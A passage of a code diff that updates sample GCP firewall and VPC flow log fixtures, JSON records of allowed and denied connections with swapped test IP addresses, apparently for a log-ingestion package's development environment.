-{"insertId":"yot1ojetjdiw","jsonPayload":{"connection":{"dest_ip":"10.42.0.2","dest_port":3389,"protocol":6,"src_ip":"192.0.2.7","src_port":1683},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-windows","zone":"us-east1-b"},"remote_location":{"city":"Almelo","continent":"Europe","country":"nld","region":"Overijssel"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["3389"]}],"priority":1000,"reference":"network:windows-isolated/firewall:windows-isolated-allow-rdp","source_range":["0.0.0.0/0"],"target_tag":["allow-rdp"]},"vpc":{"project_id":"test-beats","subnetwork_name":"windows-isolated","vpc_name":"windows-isolated"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:28.477733837Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"3238409883146034900","subnetwork_name":"windows-isolated"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:15.771161946Z"} 
-{"insertId":"5a27u1g22jks9e","jsonPayload":{"connection":{"dest_ip":"10.42.0.10","dest_port":9200,"protocol":6,"src_ip":"192.0.2.114","src_port":45068},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-kibana","zone":"us-east1-b"},"remote_location":{"continent":"America","country":"usa"},"remote_vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["9200"]}],"priority":1000,"reference":"network:default/firewall:allow9200","source_range":["0.0.0.0/0"],"target_tag":["allow9200"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:45.189726185Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:35.850729583Z"} 
-{"insertId":"5a27u1g22jks8t","jsonPayload":{"connection":{"dest_ip":"10.42.0.10","dest_port":9200,"protocol":6,"src_ip":"192.0.2.114","src_port":45062},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-kibana","zone":"us-east1-b"},"remote_location":{"continent":"America","country":"usa"},"remote_vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["9200"]}],"priority":1000,"reference":"network:default/firewall:allow9200","source_range":["0.0.0.0/0"],"target_tag":["allow9200"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:45.189726185Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:35.85023465Z"} 
+{"insertId":"4zuj4nfn4llkb","jsonPayload":{"connection":{"dest_ip":"67.43.156.13","dest_port":53,"protocol":17,"src_ip":"10.128.0.16","src_port":60094},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"America","country":"usa"},"rule_details":{"action":"DENY","destination_range":["8.8.8.0/24"],"direction":"EGRESS","ip_port_info":[{"ip_protocol":"ALL"}],"priority":1000,"reference":"network:default/firewall:adrian-test-1","target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-12T12:35:24.466374097Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-12T12:35:17.214711274Z"}
+{"insertId":"1f21ciqfpfssuo","jsonPayload":{"connection":{"dest_ip":"10.42.0.2","dest_port":3389,"protocol":6,"src_ip":"192.168.2.126","src_port":64853},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-windows","zone":"us-east1-b"},"remote_location":{"continent":"Asia","country":"omn"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["3389"]}],"priority":1000,"reference":"network:windows-isolated/firewall:windows-isolated-allow-rdp","source_range":["0.0.0.0/0"],"target_tag":["allow-rdp"]},"vpc":{"project_id":"test-beats","subnetwork_name":"windows-isolated","vpc_name":"windows-isolated"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-10-30T13:52:54.473174731Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"3238409883146034900","subnetwork_name":"windows-isolated"},"type":"gce_subnetwork"},"timestamp":"2019-10-30T13:52:42.191988835Z"}
+{"insertId":"8vcfeailjd","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":8080,"protocol":6,"src_ip":"192.168.2.219","src_port":2897},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Krasnodar","continent":"Europe","country":"rus","region":"Krasnodar Krai"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:31:22.738796433Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:31:19.421478847Z"}
+{"insertId":"1bqgmw9feiabij","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.168.2.14","src_port":61000},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"Europe","country":"deu"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:41:35.727004321Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:41:31.079508196Z"} 
+{"insertId":"1jrxaqbfe48bir","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.168.2.14","src_port":61000},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"Europe","country":"deu"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:41:40.791816098Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:41:34.190831607Z"}
+{"insertId":"1fw7drlfe2ty27","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":8080,"protocol":6,"src_ip":"192.168.2.151","src_port":62551},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Berdychiv","continent":"Europe","country":"ukr","region":"Zhytomyr Oblast"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:48:47.038820509Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:48:41.449552758Z"}
+{"insertId":"1yre751fekaxzs","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":8080,"protocol":6,"src_ip":"192.168.2.241","src_port":44542},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Vicenza","continent":"Europe","country":"ita","region":"Veneto"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T13:10:30.804549999Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T13:10:24.214995318Z"}
+{"insertId":"5kanfzfiqepkh","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.168.2.114","src_port":41293},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Tula","continent":"Europe","country":"rus","region":"Tula Oblast"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T13:35:28.934918322Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T13:35:23.504719962Z"}
+{"insertId":"59z0t8fiow9vg","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.168.2.251","src_port":59106},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Stavropol","continent":"Europe","country":"rus","region":"Stavropol Krai"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T13:36:54.238077643Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T13:36:52.135887769Z"}
+{"insertId":"1y7e4yzff816cq","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.168.2.189","src_port":61000},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Violès","continent":"Europe","country":"fra","region":"Provence-Alpes-Côte d'Azur"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T14:06:26.357446279Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T14:06:16.59353182Z"}
+{"insertId":"lx5jlsfggpr0q","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"192.168.2.189","src_port":61000},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"Violès","continent":"Europe","country":"fra","region":"Provence-Alpes-Côte d'Azur"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T14:06:28.203068653Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T14:06:22.930570324Z"} 
+{"insertId":"18ynfbufer19m1","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":8080,"protocol":6,"src_ip":"192.168.2.200","src_port":42716},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"city":"İzmir","continent":"Asia","country":"tur","region":"İzmir"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T14:32:14.038485761Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T14:32:07.407039908Z"} 
+{"insertId":"tzddthfsr6fv5","jsonPayload":{"connection":{"dest_ip":"67.43.156.13","dest_port":80,"protocol":6,"src_ip":"10.28.0.16","src_port":46418},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"America","country":"usa"},"rule_details":{"action":"DENY","destination_range":["8.8.8.0/24"],"direction":"EGRESS","ip_port_info":[{"ip_protocol":"ALL"}],"priority":1000,"reference":"network:default/firewall:adrian-test-1","target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-12T12:41:28.971534988Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-12T12:41:20.972747063Z"}
+{"insertId":"1k2b7kefsnhzq7","jsonPayload":{"connection":{"dest_ip":"67.43.156.13","dest_port":80,"protocol":17,"src_ip":"10.28.0.16","src_port":58725},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_location":{"continent":"America","country":"usa"},"rule_details":{"action":"DENY","destination_range":["8.8.8.0/24"],"direction":"EGRESS","ip_port_info":[{"ip_protocol":"ALL"}],"priority":1000,"reference":"network:default/firewall:adrian-test-1","target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-12T12:42:33.671883883Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-12T12:42:26.50532921Z"}
+{"insertId":"1sdfuwxfk8hq1c","jsonPayload":{"connection":{"dest_ip":"10.42.0.10","dest_port":9200,"protocol":6,"src_ip":"192.168.2.114","src_port":44666},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-kibana","zone":"us-east1-b"},"remote_location":{"continent":"America","country":"usa"},"remote_vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["9200"]}],"priority":1000,"reference":"network:default/firewall:allow9200","source_range":["0.0.0.0/0"],"target_tag":["allow9200"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:15.188832255Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:13.531819246Z"} 
+{"insertId":"1sdfuwxfk8hq1b","jsonPayload":{"connection":{"dest_ip":"10.42.0.10","dest_port":9200,"protocol":6,"src_ip":"192.168.2.114","src_port":44668},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-kibana","zone":"us-east1-b"},"remote_location":{"continent":"America","country":"usa"},"remote_vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["9200"]}],"priority":1000,"reference":"network:default/firewall:allow9200","source_range":["0.0.0.0/0"],"target_tag":["allow9200"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:15.188832255Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:13.551617516Z"} 
+{"insertId":"yot1ojetjdiw","jsonPayload":{"connection":{"dest_ip":"10.42.0.2","dest_port":3389,"protocol":6,"src_ip":"192.168.2.7","src_port":1683},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-windows","zone":"us-east1-b"},"remote_location":{"city":"Almelo","continent":"Europe","country":"nld","region":"Overijssel"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["3389"]}],"priority":1000,"reference":"network:windows-isolated/firewall:windows-isolated-allow-rdp","source_range":["0.0.0.0/0"],"target_tag":["allow-rdp"]},"vpc":{"project_id":"test-beats","subnetwork_name":"windows-isolated","vpc_name":"windows-isolated"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:28.477733837Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"3238409883146034900","subnetwork_name":"windows-isolated"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:15.771161946Z"} 
+{"insertId":"5a27u1g22jks9e","jsonPayload":{"connection":{"dest_ip":"10.42.0.10","dest_port":9200,"protocol":6,"src_ip":"192.168.2.114","src_port":45068},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-kibana","zone":"us-east1-b"},"remote_location":{"continent":"America","country":"usa"},"remote_vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["9200"]}],"priority":1000,"reference":"network:default/firewall:allow9200","source_range":["0.0.0.0/0"],"target_tag":["allow9200"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:45.189726185Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:35.850729583Z"} 
+{"insertId":"5a27u1g22jks8t","jsonPayload":{"connection":{"dest_ip":"10.42.0.10","dest_port":9200,"protocol":6,"src_ip":"192.168.2.114","src_port":45062},"disposition":"ALLOWED","instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-kibana","zone":"us-east1-b"},"remote_location":{"continent":"America","country":"usa"},"remote_vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"},"rule_details":{"action":"ALLOW","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["9200"]}],"priority":1000,"reference":"network:default/firewall:allow9200","source_range":["0.0.0.0/0"],"target_tag":["allow9200"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-11T12:54:45.189726185Z","resource":{"labels":{"location":"us-east1-b","project_id":"test-beats","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-11T12:54:35.85023465Z"} 
{"insertId":"1dobeotg13df9f5","jsonPayload":{"connection":{"dest_ip":"10.28.0.16","dest_port":80,"protocol":6,"src_ip":"10.42.0.10","src_port":57794},"disposition":"DENIED","instance":{"project_id":"test-beats","region":"us-central1","vm_name":"adrian-test","zone":"us-central1-a"},"remote_instance":{"project_id":"test-beats","region":"us-east1","vm_name":"test-es","zone":"us-east1-b"},"remote_vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"},"rule_details":{"action":"DENY","direction":"INGRESS","ip_port_info":[{"ip_protocol":"TCP","port_range":["80","8080"]}],"priority":1000,"reference":"network:default/firewall:adrian-test-3","source_range":["0.0.0.0/0"],"target_tag":["adrian-test"]},"vpc":{"project_id":"test-beats","subnetwork_name":"default","vpc_name":"default"}},"logName":"projects/test-beats/logs/compute.googleapis.com%2Ffirewall","receiveTimestamp":"2019-11-06T16:41:45.009675991Z","resource":{"labels":{"location":"us-central1-a","project_id":"test-beats","subnetwork_id":"1266623735137648253","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-11-06T16:41:38.394575419Z"}
diff --git a/packages/gcp/_dev/deploy/docker/sample_logs/vpcflow.log b/packages/gcp/_dev/deploy/docker/sample_logs/vpcflow.log
index 6e27f806daa..9d9cf86c8df 100644
--- a/packages/gcp/_dev/deploy/docker/sample_logs/vpcflow.log
+++ b/packages/gcp/_dev/deploy/docker/sample_logs/vpcflow.log
@@ -1,296 +1,296 @@
-{"insertId":"ut8lbrffooxyw","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"203.0.113.12","dest_port":33478,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:45:37.301953198Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:45:37.186193305Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"}
-{"insertId":"ut8lbrffooxzb","jsonPayload":{"bytes_sent":"173663","connection":{"dest_ip":"10.87.40.76","dest_port":33970,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"68","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466657665Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"}
-{"insertId":"ut8lbrffooxze","jsonPayload":{"bytes_sent":"155707","connection":{"dest_ip":"203.0.113.134","dest_port":33576,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821143836Z","packets_sent":"78","reporter":"SRC","rtt_msec":"201","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510622432Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"}
-{"insertId":"ut8lbrffooxyz","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"192.0.2.23","dest_port":59679,"protocol":6,"src_ip":"10.139.99.242","src_port":22},"dest_location":{"asn":49505,"city":"Saint Petersburg","continent":"Europe","country":"rus","region":"Saint Petersburg"},"end_time":"2019-06-14T03:40:46.031032701Z","packets_sent":"1","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:45.860349247Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"}
-{"insertId":"ut8lbrffooxz6","jsonPayload":{"bytes_sent":"1784","connection":{"dest_ip":"192.0.2.117","dest_port":50646,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:40:37.048196137Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:36.895188084Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:10.845445834Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:10.845445834Z"}
